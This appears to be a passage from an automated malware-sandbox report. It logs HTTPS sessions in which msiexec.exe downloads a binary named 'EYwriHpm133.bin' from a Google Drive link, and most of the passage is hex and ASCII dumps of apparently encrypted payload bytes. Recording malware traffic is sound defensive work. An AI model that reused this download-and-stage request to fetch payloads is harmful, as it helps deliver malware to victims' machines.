                                                                                                    Data Ascii: e<qRy4AjZnO<h6H4Uh%PE\wZV?oW|</Cz~Jm5_7cBQ+]&1xe>=~d4h`P_}W!JVxgAx?sH>{2!Rf:>eRH=x"&[RAm46Q0O;[8nH~JY`_R~x} NZ
                                                                                                    2024-10-24 06:46:49 UTC1323INData Raw: 8c cc 91 d2 87 bb ff 0c 1b 32 4c 51 7a 84 d1 38 c5 cc 92 28 d2 b7 d5 24 0b 80 38 39 3b 46 0b 57 89 56 33 b3 1d 33 37 68 26 c8 c2 22 93 4d e1 2a 09 03 2d de 05 08 4b 56 23 77 ac 4f 9a 6e 2c 50 b5 14 0a 80 66 0c 21 58 7a c0 63 97 4c 71 cf 60 e1 1b 1c 71 7d 41 b3 dc 9d 6b 14 3d f5 75 a9 a9 3e ef 34 e9 50 b5 cd a4 3c 4e 26 d5 8e fe 96 e5 df ac 1d 31 97 f6 4c c1 70 46 b3 22 69 f5 d1 ab bb 7b fb 10 46 24 35 62 be 27 50 30 20 60 fb df f8 04 c8 0b fe 23 63 f9 b0 b5 fa eb 04 6e 0e f0 27 88 8a 21 95 48 62 3f 4a 15 29 53 91 01 75 91 88 14 79 be c1 06 f4 4f bf 33 5e 52 c3 59 3f ca 7c 34 36 36 62 47 9e 33 50 5f 78 72 78 23 7b c9 e3 4c 79 32 7b f3 20 36 c1 ae 50 80 3c dc f0 45 11 3c 72 8b 37 c6 87 e8 a4 a1 8b 7b 0b 19 fc af b1 37 cb 8f 36 9e 5e 22 ee f6 02 ed be 19 29
                                                                                                    Data Ascii: 2LQz8($89;FWV337h&"M*-KV#wOn,Pf!XzcLq`q}Ak=u>4P<N&1LpF"i{F$5b'P0 `#cn'!Hb?J)SuyO3^RY?|466bG3P_xrx#{Ly2{ 6P<E<r7{76^")
                                                                                                    2024-10-24 06:46:49 UTC1378INData Raw: 55 35 eb bf 1b d2 1e fd 80 d0 81 e5 1a e3 04 31 b6 9c 56 0d a7 e8 8a 9c ec 5e 54 cb c0 e6 33 5e c1 c4 c5 51 41 c5 6a 66 3f ff 81 4f e0 13 ab 81 c2 22 96 85 e3 6b 45 8b a9 72 a5 23 00 35 69 23 6f 1f 58 1f 8a e6 72 33 52 59 35 ef 68 06 fd 44 44 c3 ff 7e c7 bd 53 75 20 c9 f1 16 1d 64 99 1b 27 7a 42 06 6f 52 ee 23 91 21 21 f7 ae 7d 3a 9e f1 a4 4a d4 23 d4 98 f9 96 d4 0d 70 5b c8 fd 0f b3 21 5a 28 7b 81 f4 14 70 e2 87 21 29 ec 05 52 23 97 74 5c 74 c1 8f ab e0 3e 27 ed bb 10 e6 57 04 06 1c a6 14 34 6b e7 89 f6 54 e5 ed cf 1d 6d 60 43 92 c3 40 c6 45 35 fd 49 28 2e f5 05 82 1c 17 ed 03 f7 a1 36 13 16 dd 8e b8 f3 20 21 f3 9c 78 ca 47 9c fd fe 14 a2 83 12 71 37 08 bf 5a 49 eb 9e 41 31 4e 37 5d 3c 72 06 1e 46 a3 e8 a4 a1 ca cb 30 33 b0 55 f9 c2 4a 34 e6 19 96 de 23
                                                                                                    Data Ascii: U51V^T3^QAjf?O"kEr#5i#oXr3RY5hDD~Su d'zBoR#!!}:J#p[!Z({p!)R#t\t>'W4kTm`C@E5I(.6 !xGq7ZIA1N7]<rF03UJ4#
                                                                                                    2024-10-24 06:46:49 UTC1378INData Raw: 6a 9c 27 cc 7a c0 b1 6f c0 ec 0e f5 0c f4 2b 27 a3 92 ff 28 5e 30 69 4c 80 5e 10 e2 95 73 cb 46 c3 eb 04 6e 61 0e 08 57 f6 2f 20 ee 6a 1c ed e0 c2 29 28 b9 66 e1 fa b9 9c a7 96 bd 80 c0 20 65 4b 1b ec d8 eb d7 83 89 db 7c 70 ab ab 3d 0e b2 9b c3 09 f0 70 1b 1e 0d ea 46 23 28 92 e7 d9 6e ec 9f 50 c8 2e 2c bf 1e 8d a2 2b 78 dc 2a 02 c8 52 de 45 18 5a 1c 55 97 c6 15 6a 12 19 5f d9 76 bf 11 74 32 4a 46 70 01 49 a3 48 d9 05 14 2f 5e d9 16 3b 69 d5 8d 90 a8 72 4f c2 c3 f0 26 75 23 89 87 65 3c 06 6f b5 24 5d 84 4b d6 1c 99 03 63 80 65 8a 7b 8a 7f b9 84 fe bd 51 63 b6 2f 44 d6 83 71 68 bb 55 8c 70 b0 4f a2 9a 98 64 6b be 76 5e ef f4 af 97 db a8 fe 2c 1c 8a 84 ba 42 eb f3 c2 6c 2e 06 fc ed 31 99 16 90 ee b3 99 84 b1 3b 56 18 98 22 7e 3e 91 a9 cb e6 36 23 ca 5a 3b
                                                                                                    Data Ascii: j'zo+'(^0iL^sFnaW/ j)(f eK|p=pF#(nP.,+x*REZUj_vt2JFpIH/^;irO&u#e<o$]Kce{Qc/DqhUpOdkv^,Bl.1;V"~>6#Z;
                                                                                                    2024-10-24 06:46:49 UTC1378INData Raw: bc ca 66 c7 4e e1 41 34 b0 30 9c e7 57 b5 8a 37 2e 22 db f3 41 e9 a9 bd 18 3a 40 3d 07 8b de c6 34 1e 27 44 28 25 48 c7 4b 95 b3 f2 9b 2e a7 f0 4b 02 40 20 ec 6a 44 36 8f 12 c0 85 c0 81 39 5d 23 4d c5 f8 4a c2 7c bb fe 12 f7 b1 62 53 99 87 e9 3c 63 9f 5e 17 22 67 5b b5 9a 6a d9 02 6f 1f 10 96 5e e8 db aa 3b 9c d4 69 39 91 8d 2c 66 fa 5d df 8e 55 49 2a 24 dd f2 75 e2 a1 5a b2 89 48 b6 89 08 c2 78 eb d6 60 bd 27 e0 d8 f2 46 25 e1 34 a3 b3 12 4b a9 bb cb 95 45 2f 7d f2 d4 f1 a3 20 22 c2 20 f8 e9 44 fc dd 6f f9 d0 15 bc 05 68 28 e2 f5 02 ba 6a 1b 29 90 a7 87 15 b3 e8 5a a3 2e 82 a9 11 50 84 5e 8f e1 44 17 87 d1 b9 71 73 d7 d8 5f 85 bb 31 02 1b ee 5e b8 11 96 9c aa c2 8a 41 c7 52 4f 38 cf c2 b6 a4 2a 31 27 c8 fa 53 ee 55 19 15 80 83 c6 df 47 ea c1 f9 1a 09 9d
                                                                                                    Data Ascii: fNA40W7."A:@=4'D(%HK.K@ jD69]#MJ|bS<c^"g[jo^;i9,f]UI*$uZHx`'F%4KE/} " Doh(j)Z.P^Dqs_1^ARO8*1'SUG
                                                                                                    2024-10-24 06:46:49 UTC1378INData Raw: 78 92 ce 1e 30 9f 81 aa 09 43 dc b9 b7 42 dc 7f 5d 78 04 99 b0 63 d1 7c d5 23 87 56 9b d8 5f ad 5f 16 90 d8 82 ad 85 0e 92 38 6e 12 41 0f c3 7e 64 15 79 26 c2 91 d0 a0 12 5b 6b b9 36 00 3e b8 df 6f 8f 33 7d e5 36 2e 1b b8 ef 8a 12 9b 50 f8 f5 eb 9d 6d 02 12 1c 08 74 66 77 49 01 4d c5 5e 65 2e 41 70 30 83 dc e7 b1 90 41 68 70 a9 4e 14 69 6b 25 ad 2d 9b db a2 2e 40 1a 4e 1f d7 f7 e7 ff f2 75 a0 a7 71 33 9d 60 8a 09 ff 82 a1 95 cb de e3 94 12 eb 08 12 b8 de c1 93 a4 36 6a e8 0f fb 67 bd ef a4 73 85 1c 3d d2 87 d1 60 96 52 9e ce 6a 23 f1 4e 6e 1c 6f 25 00 dd e0 e8 c9 47 d0 25 b9 27 da 38 5b 2b a4 82 85 9b 77 54 d2 c9 80 e5 0f 77 d3 a5 5d f3 91 f9 c5 41 0d 7e b3 ce 97 83 e3 70 24 89 a0 a3 6b 00 eb b2 8f 2c f9 c7 f2 73 3c a8 ea b9 7a 60 fc e2 ec a9 14 b3 55 09
                                                                                                    Data Ascii: x0CB]xc|#V__8nA~dy&[k6>o3}6.PmtfwIM^e.Ap0AhpNik%-.@Nuq3`6jgs=`Rj#Nno%G%'8[+wTw]A~p$k,s<z`U
                                                                                                    2024-10-24 06:46:49 UTC1378INData Raw: 42 5e ce 2c 36 2a 11 2c e6 8d f1 ad 92 09 45 b7 13 87 37 bc 33 58 a3 7a 7f 21 e5 10 12 2b 0e 11 01 b8 6d 65 e6 45 e7 25 49 d9 54 b4 0e 4b 87 e4 11 64 a9 0e f1 37 40 26 88 d8 5a 5b a1 cb f1 3a d2 91 f2 8b b5 86 c3 30 d7 42 5d 32 83 4e 50 fd e0 1a 01 55 88 b5 dd e8 22 a1 b3 e9 eb 08 ee f7 8b 9a 8c aa fe 15 29 11 57 57 de 51 7b dc 09 39 9e 48 8c 98 9b 63 d9 8c 22 75 78 1c 03 29 cc fa e2 09 9e 45 a0 f2 37 4f 62 37 32 5f d5 89 6d 9d 27 1f 1c 00 2b 48 aa 3e ed f9 b5 8b a4 98 e7 c0 3d b2 11 3c 7b 22 48 98 b7 10 5b 23 62 7e 9a f0 1a c9 d8 4b e0 27 13 c8 25 1b 0a 8e 9a 7b 05 d6 d3 7f 45 34 06 ee f0 10 e5 24 75 7a 2c 61 c9 50 cd 6b 73 62 cc b3 87 1b 6e c0 c0 90 52 bf a9 83 1f 6f 10 47 0f 3d de 58 19 ea b7 67 3e 80 95 d6 b1 41 8c cd d8 68 cf 11 d3 df 33 03 35 58 7d
                                                                                                    Data Ascii: B^,6*,E73Xz!+meE%ITKd7@&Z[:0B]2NPU")WWQ{9Hc"ux)E7Ob72_m'+H>=<{"H[#b~K'%{E4$uz,aPksbnRoG=Xg>Ah35X}
                                                                                                    2024-10-24 06:46:49 UTC1378INData Raw: b0 89 ba 0d 02 45 fb 3d 2b 98 a4 7a 5c 53 7b ec dd cc d7 2b 23 d8 da ef cd 08 03 e4 f1 4b 8f a4 28 01 eb ff 06 02 32 6e c7 21 9e 76 64 db 34 a6 73 c7 63 f9 13 75 a6 e3 4e ab 93 ba 04 17 03 21 65 da b7 c2 db b8 4e 6a 30 25 63 fe b3 dd 43 6c 20 c3 5c 43 f6 eb 7c c2 1b 4d 01 49 b5 e8 17 7b 31 3e d9 06 37 39 3c 20 15 aa 29 66 41 a0 26 ba 7f ab 47 b8 06 ca 3d 63 22 ed c6 4e a3 3a 63 41 4d 1f 7d 0c 16 be 24 dd 79 41 d2 ec 1b c1 d9 91 b1 f7 0e 17 5b 6e b1 ef 50 8b fa f8 bb df db 59 2a 9a 03 a2 e7 19 dd a7 e6 4b 30 c3 93 06 6f 35 30 2a 4a f3 aa 70 59 aa c6 9f 16 c8 42 43 bb 00 12 d1 72 1d 37 28 e6 50 7b fe d1 8f 85 e8 2d 41 ba 44 c2 54 32 5a ee 2f 74 05 d9 f8 15 86 ec 86 a8 82 fe 39 00 ab 6e b8 d5 78 14 b9 5c d2 d9 75 34 51 59 c4 5c 1b 30 aa 84 03 d1 43 53 21 b2
                                                                                                    Data Ascii: E=+z\S{+#K(2n!vd4scuN!eNj0%cCl \C|MI{1>79< )fA&G=c"N:cAM}$yA[nPY*K0o50*JpYBCr7(P{-ADT2Z/t9nx\u4QY\0CS!
                                                                                                    2024-10-24 06:46:49 UTC1378INData Raw: ba 93 19 cf ee 6e 40 b1 f8 7d 19 53 92 b0 2e 86 7e bf ad 48 f2 79 3a 18 78 8a 13 c7 60 94 86 be 41 a1 16 bc fe 4c d7 a3 a4 7b 20 be 53 c4 31 e3 e4 f4 3d 58 e7 e3 5f 98 12 05 0d 26 de 93 7d 85 a2 ce ef 74 1a 41 a8 8f ed fb 3d d6 9c ed 05 58 86 04 cb 4b 53 4b b5 6d 05 4a 7c 0c f0 62 95 b8 cd 73 15 ef 45 2e b8 45 7c 6c 9e 86 79 85 df 98 f5 36 e1 fa 13 be ba ff 40 93 7c 73 9a 3c c4 00 cf bc fa de c2 e3 aa 22 ad 2d d0 bd d2 09 cc 88 1b 83 2d 8f 52 aa 39 21 f3 d0 db 58 d4 75 3b 6f f7 ea 4c b8 0e 6e 24 94 8a 07 56 e9 79 e7 66 fa 1e 8a 62 fc 55 ae 40 a8 a3 29 e6 12 44 bd 4c 7a 2d ac 73 2e 65 e4 ac 0d 37 40 86 7c e7 66 2c cf f9 b8 53 03 29 32 ca 06 d2 d3 8f d6 41 d7 b9 57 ee 49 27 94 29 96 3b 60 e1 2a 82 ee 1c ae 9c b3 5b c3 5e e3 f7 62 86 76 c9 9c b3 8d 1c 9e c6
                                                                                                    Data Ascii: n@}S.~Hy:x`AL{ S1=X_&}tA=XKSKmJ|bsE.E|ly6@|s<"--R9!Xu;oLn$VyfbU@)DLz-s.e7@|f,S)2AWI');`*[^bv


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.449740142.250.185.1424437128C:\Windows\SysWOW64\msiexec.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 06:46:51 UTC216OUTGET /uc?export=download&id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4 HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                    Host: drive.google.com
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-10-24 06:46:51 UTC1610INHTTP/1.1 303 See Other
                                                                                                    Content-Type: application/binary
                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                    Date: Thu, 24 Oct 2024 06:46:51 GMT
                                                                                                    Location: https://drive.usercontent.google.com/download?id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4&export=download
                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                    Content-Security-Policy: script-src 'nonce-Z_NptSR0XOtcyQLae4MdaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                    Server: ESF
                                                                                                    Content-Length: 0
                                                                                                    X-XSS-Protection: 0
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.449742142.250.186.974437128C:\Windows\SysWOW64\msiexec.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 06:46:52 UTC258OUTGET /download?id=1vjcptESgL1QfRWsuKo-4pCK5T2ipAUA4&export=download HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                    Cache-Control: no-cache
                                                                                                    Host: drive.usercontent.google.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-24 06:46:54 UTC4917INHTTP/1.1 200 OK
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Security-Policy: sandbox
                                                                                                    Content-Security-Policy: default-src 'none'
                                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                                    X-Content-Security-Policy: sandbox
                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Content-Disposition: attachment; filename="EYwriHpm133.bin"
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Credentials: false
                                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 287296
                                                                                                    Last-Modified: Wed, 23 Oct 2024 05:45:25 GMT
                                                                                                    X-GUploader-UploadID: AHmUCY1M1Scf18A4-vZryqbD9q245IbaTrJjMmBF_dWsp0_jNNR510KKejg4Ih2ZFZw3k0qk6uIXCb-DDg
                                                                                                    Date: Thu, 24 Oct 2024 06:46:54 GMT
                                                                                                    Expires: Thu, 24 Oct 2024 06:46:54 GMT
                                                                                                    Cache-Control: private, max-age=0
                                                                                                    X-Goog-Hash: crc32c=LPFnww==
                                                                                                    Server: UploadServer
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close
                                                                                                    2024-10-24 06:46:54 UTC4917INData Raw: 95 52 c7 76 61 28 83 c9 05 78 d8 4e 57 c3 62 2b 93 26 bb e2 65 89 8f d9 98 6c 83 b1 f3 fc 30 43 bc 66 db 96 80 cd b4 28 a5 d3 d7 57 44 9e 38 90 5d 39 33 35 c7 3c c7 68 6c ca 57 0e 7e ee 4a 68 be d7 5c 68 78 f5 2b f0 92 98 39 96 8e 56 bf 66 93 16 69 8b c0 dc 99 f4 19 5e 73 b5 e0 d8 9a f0 cd fb 70 dc 23 11 a5 0a 80 12 8a b6 00 b3 4f 72 61 89 b3 6d 3b 14 2e 14 a8 8e 01 a4 5f 4d 7e 30 9c 20 54 7c 3a 44 2b 82 46 64 a2 af 28 72 85 1c 02 d2 07 bd 61 19 80 f8 36 f1 80 ad 62 09 05 a8 19 57 61 bb 05 ad 51 33 e4 3f cb 75 c0 1f e7 e2 60 74 a2 64 74 b0 12 5b 94 cc d3 f3 9f 94 b0 9c 6f 29 40 55 be f9 60 e8 7b 54 9e f1 07 ae fb 54 3d 0b 4f 94 e4 3d 23 2e bf 94 c0 4a 0a 4f 6b 64 15 f0 1f 5c d7 29 9c f9 24 10 5f ce f4 0e e7 a3 00 66 04 ed 4c 3b 41 2d 1b 13 f5 d7 f2 16 af
                                                                                                    Data Ascii: Rva(xNWb+&el0Cf(WD8]935<hlW~Jh\hx+9Vfi^sp#Oram;._M~0 T|:D+Fd(ra6bWaQ3?u`tdt[o)@U`{TT=O=#.JOkd\)$_fL;A-
                                                                                                    2024-10-24 06:46:54 UTC4864INData Raw: 65 ea a6 c0 8f 0e 3c b4 a1 82 71 52 8f 89 9b 79 34 c7 41 6a d2 5a 1c 6e 92 cd bc 9c ba 09 98 4f 3c 88 ab 04 68 36 48 01 34 55 90 1d 68 c3 25 50 0d d0 45 02 1c 5c 77 8c a9 c0 5a 56 e5 fb 3f 6f 57 ee 1e 7c 3c 2f a9 1b 43 98 7a 7e ee 4a e4 fe 6d 35 5f 90 a0 95 0d aa 37 8b 8d 11 7f 63 42 51 2b 5d e2 1d e0 fe 83 26 ca 31 78 aa 65 3e f7 3d a2 7e dc ea 64 fd f1 34 68 60 50 ae c6 5f 80 7f a1 1a 13 c5 7d 93 aa 57 e7 21 18 05 0f dd bf 88 03 87 4a 56 78 0e 95 67 03 41 c5 9a 0c c2 92 78 c3 91 3f 73 0b bd c0 8a 48 3e 7b 32 21 52 66 f9 cd 3a 01 3e 65 bf 52 e9 14 48 a6 b7 3d fe 78 22 9a 81 dd 26 c0 ce a5 e3 5b de 52 92 41 b4 6d 34 ea c9 36 51 a7 aa 30 03 9a 4f 3b 5b bc 38 1d dd ed 6e c7 48 a2 ea e5 7e e8 a4 4a ff 59 60 5f 52 7e 78 01 ab e3 7d 20 c9 c1 4e e7 d3 14 bb 5a
                                                                                                    Data Ascii: e<qRy4AjZnO<h6H4Uh%PE\wZV?oW|</Cz~Jm5_7cBQ+]&1xe>=~d4h`P_}W!JVxgAx?sH>{2!Rf:>eRH=x"&[RAm46Q0O;[8nH~JY`_R~x} NZ
                                                                                                    2024-10-24 06:46:54 UTC1324INData Raw: 8c cc 91 d2 87 bb ff 0c 1b 32 4c 51 7a 84 d1 38 c5 cc 92 28 d2 b7 d5 24 0b 80 38 39 3b 46 0b 57 89 56 33 b3 1d 33 37 68 26 c8 c2 22 93 4d e1 2a 09 03 2d de 05 08 4b 56 23 77 ac 4f 9a 6e 2c 50 b5 14 0a 80 66 0c 21 58 7a c0 63 97 4c 71 cf 60 e1 1b 1c 71 7d 41 b3 dc 9d 6b 14 3d f5 75 a9 a9 3e ef 34 e9 50 b5 cd a4 3c 4e 26 d5 8e fe 96 e5 df ac 1d 31 97 f6 4c c1 70 46 b3 22 69 f5 d1 ab bb 7b fb 10 46 24 35 62 be 27 50 30 20 60 fb df f8 04 c8 0b fe 23 63 f9 b0 b5 fa eb 04 6e 0e f0 27 88 8a 21 95 48 62 3f 4a 15 29 53 91 01 75 91 88 14 79 be c1 06 f4 4f bf 33 5e 52 c3 59 3f ca 7c 34 36 36 62 47 9e 33 50 5f 78 72 78 23 7b c9 e3 4c 79 32 7b f3 20 36 c1 ae 50 80 3c dc f0 45 11 3c 72 8b 37 c6 87 e8 a4 a1 8b 7b 0b 19 fc af b1 37 cb 8f 36 9e 5e 22 ee f6 02 ed be 19 29
                                                                                                    Data Ascii: 2LQz8($89;FWV337h&"M*-KV#wOn,Pf!XzcLq`q}Ak=u>4P<N&1LpF"i{F$5b'P0 `#cn'!Hb?J)SuyO3^RY?|466bG3P_xrx#{Ly2{ 6P<E<r7{76^")
                                                                                                    2024-10-24 06:46:54 UTC1378INData Raw: 35 eb bf 1b d2 1e fd 80 d0 81 e5 1a e3 04 31 b6 9c 56 0d a7 e8 8a 9c ec 5e 54 cb c0 e6 33 5e c1 c4 c5 51 41 c5 6a 66 3f ff 81 4f e0 13 ab 81 c2 22 96 85 e3 6b 45 8b a9 72 a5 23 00 35 69 23 6f 1f 58 1f 8a e6 72 33 52 59 35 ef 68 06 fd 44 44 c3 ff 7e c7 bd 53 75 20 c9 f1 16 1d 64 99 1b 27 7a 42 06 6f 52 ee 23 91 21 21 f7 ae 7d 3a 9e f1 a4 4a d4 23 d4 98 f9 96 d4 0d 70 5b c8 fd 0f b3 21 5a 28 7b 81 f4 14 70 e2 87 21 29 ec 05 52 23 97 74 5c 74 c1 8f ab e0 3e 27 ed bb 10 e6 57 04 06 1c a6 14 34 6b e7 89 f6 54 e5 ed cf 1d 6d 60 43 92 c3 40 c6 45 35 fd 49 28 2e f5 05 82 1c 17 ed 03 f7 a1 36 13 16 dd 8e b8 f3 20 21 f3 9c 78 ca 47 9c fd fe 14 a2 83 12 71 37 08 bf 5a 49 eb 9e 41 31 4e 37 5d 3c 72 06 1e 46 a3 e8 a4 a1 ca cb 30 33 b0 55 f9 c2 4a 34 e6 19 96 de 23 ca
                                                                                                    Data Ascii: 51V^T3^QAjf?O"kEr#5i#oXr3RY5hDD~Su d'zBoR#!!}:J#p[!Z({p!)R#t\t>'W4kTm`C@E5I(.6 !xGq7ZIA1N7]<rF03UJ4#
                                                                                                    2024-10-24 06:46:54 UTC1378INData Raw: 9c 27 cc 7a c0 b1 6f c0 ec 0e f5 0c f4 2b 27 a3 92 ff 28 5e 30 69 4c 80 5e 10 e2 95 73 cb 46 c3 eb 04 6e 61 0e 08 57 f6 2f 20 ee 6a 1c ed e0 c2 29 28 b9 66 e1 fa b9 9c a7 96 bd 80 c0 20 65 4b 1b ec d8 eb d7 83 89 db 7c 70 ab ab 3d 0e b2 9b c3 09 f0 70 1b 1e 0d ea 46 23 28 92 e7 d9 6e ec 9f 50 c8 2e 2c bf 1e 8d a2 2b 78 dc 2a 02 c8 52 de 45 18 5a 1c 55 97 c6 15 6a 12 19 5f d9 76 bf 11 74 32 4a 46 70 01 49 a3 48 d9 05 14 2f 5e d9 16 3b 69 d5 8d 90 a8 72 4f c2 c3 f0 26 75 23 89 87 65 3c 06 6f b5 24 5d 84 4b d6 1c 99 03 63 80 65 8a 7b 8a 7f b9 84 fe bd 51 63 b6 2f 44 d6 83 71 68 bb 55 8c 70 b0 4f a2 9a 98 64 6b be 76 5e ef f4 af 97 db a8 fe 2c 1c 8a 84 ba 42 eb f3 c2 6c 2e 06 fc ed 31 99 16 90 ee b3 99 84 b1 3b 56 18 98 22 7e 3e 91 a9 cb e6 36 23 ca 5a 3b 19
                                                                                                    Data Ascii: 'zo+'(^0iL^sFnaW/ j)(f eK|p=pF#(nP.,+x*REZUj_vt2JFpIH/^;irO&u#e<o$]Kce{Qc/DqhUpOdkv^,Bl.1;V"~>6#Z;
                                                                                                    2024-10-24 06:46:54 UTC1378INData Raw: ca 66 c7 4e e1 41 34 b0 30 9c e7 57 b5 8a 37 2e 22 db f3 41 e9 a9 bd 18 3a 40 3d 07 8b de c6 34 1e 27 44 28 25 48 c7 4b 95 b3 f2 9b 2e a7 f0 4b 02 40 20 ec 6a 44 36 8f 12 c0 85 c0 81 39 5d 23 4d c5 f8 4a c2 7c bb fe 12 f7 b1 62 53 99 87 e9 3c 63 9f 5e 17 22 67 5b b5 9a 6a d9 02 6f 1f 10 96 5e e8 db aa 3b 9c d4 69 39 91 8d 2c 66 fa 5d df 8e 55 49 2a 24 dd f2 75 e2 a1 5a b2 89 48 b6 89 08 c2 78 eb d6 60 bd 27 e0 d8 f2 46 25 e1 34 a3 b3 12 4b a9 bb cb 95 45 2f 7d f2 d4 f1 a3 20 22 c2 20 f8 e9 44 fc dd 6f f9 d0 15 bc 05 68 28 e2 f5 02 ba 6a 1b 29 90 a7 87 15 b3 e8 5a a3 2e 82 a9 11 50 84 5e 8f e1 44 17 87 d1 b9 71 73 d7 d8 5f 85 bb 31 02 1b ee 5e b8 11 96 9c aa c2 8a 41 c7 52 4f 38 cf c2 b6 a4 2a 31 27 c8 fa 53 ee 55 19 15 80 83 c6 df 47 ea c1 f9 1a 09 9d bf
                                                                                                    Data Ascii: fNA40W7."A:@=4'D(%HK.K@ jD69]#MJ|bS<c^"g[jo^;i9,f]UI*$uZHx`'F%4KE/} " Doh(j)Z.P^Dqs_1^ARO8*1'SUG
                                                                                                    2024-10-24 06:46:54 UTC1378INData Raw: 92 ce 1e 30 9f 81 aa 09 43 dc b9 b7 42 dc 7f 5d 78 04 99 b0 63 d1 7c d5 23 87 56 9b d8 5f ad 5f 16 90 d8 82 ad 85 0e 92 38 6e 12 41 0f c3 7e 64 15 79 26 c2 91 d0 a0 12 5b 6b b9 36 00 3e b8 df 6f 8f 33 7d e5 36 2e 1b b8 ef 8a 12 9b 50 f8 f5 eb 9d 6d 02 12 1c 08 74 66 77 49 01 4d c5 5e 65 2e 41 70 30 83 dc e7 b1 90 41 68 70 a9 4e 14 69 6b 25 ad 2d 9b db a2 2e 40 1a 4e 1f d7 f7 e7 ff f2 75 a0 a7 71 33 9d 60 8a 09 ff 82 a1 95 cb de e3 94 12 eb 08 12 b8 de c1 93 a4 36 6a e8 0f fb 67 bd ef a4 73 85 1c 3d d2 87 d1 60 96 52 9e ce 6a 23 f1 4e 6e 1c 6f 25 00 dd e0 e8 c9 47 d0 25 b9 27 da 38 5b 2b a4 82 85 9b 77 54 d2 c9 80 e5 0f 77 d3 a5 5d f3 91 f9 c5 41 0d 7e b3 ce 97 83 e3 70 24 89 a0 a3 6b 00 eb b2 8f 2c f9 c7 f2 73 3c a8 ea b9 7a 60 fc e2 ec a9 14 b3 55 09 d5
                                                                                                    Data Ascii: 0CB]xc|#V__8nA~dy&[k6>o3}6.PmtfwIM^e.Ap0AhpNik%-.@Nuq3`6jgs=`Rj#Nno%G%'8[+wTw]A~p$k,s<z`U
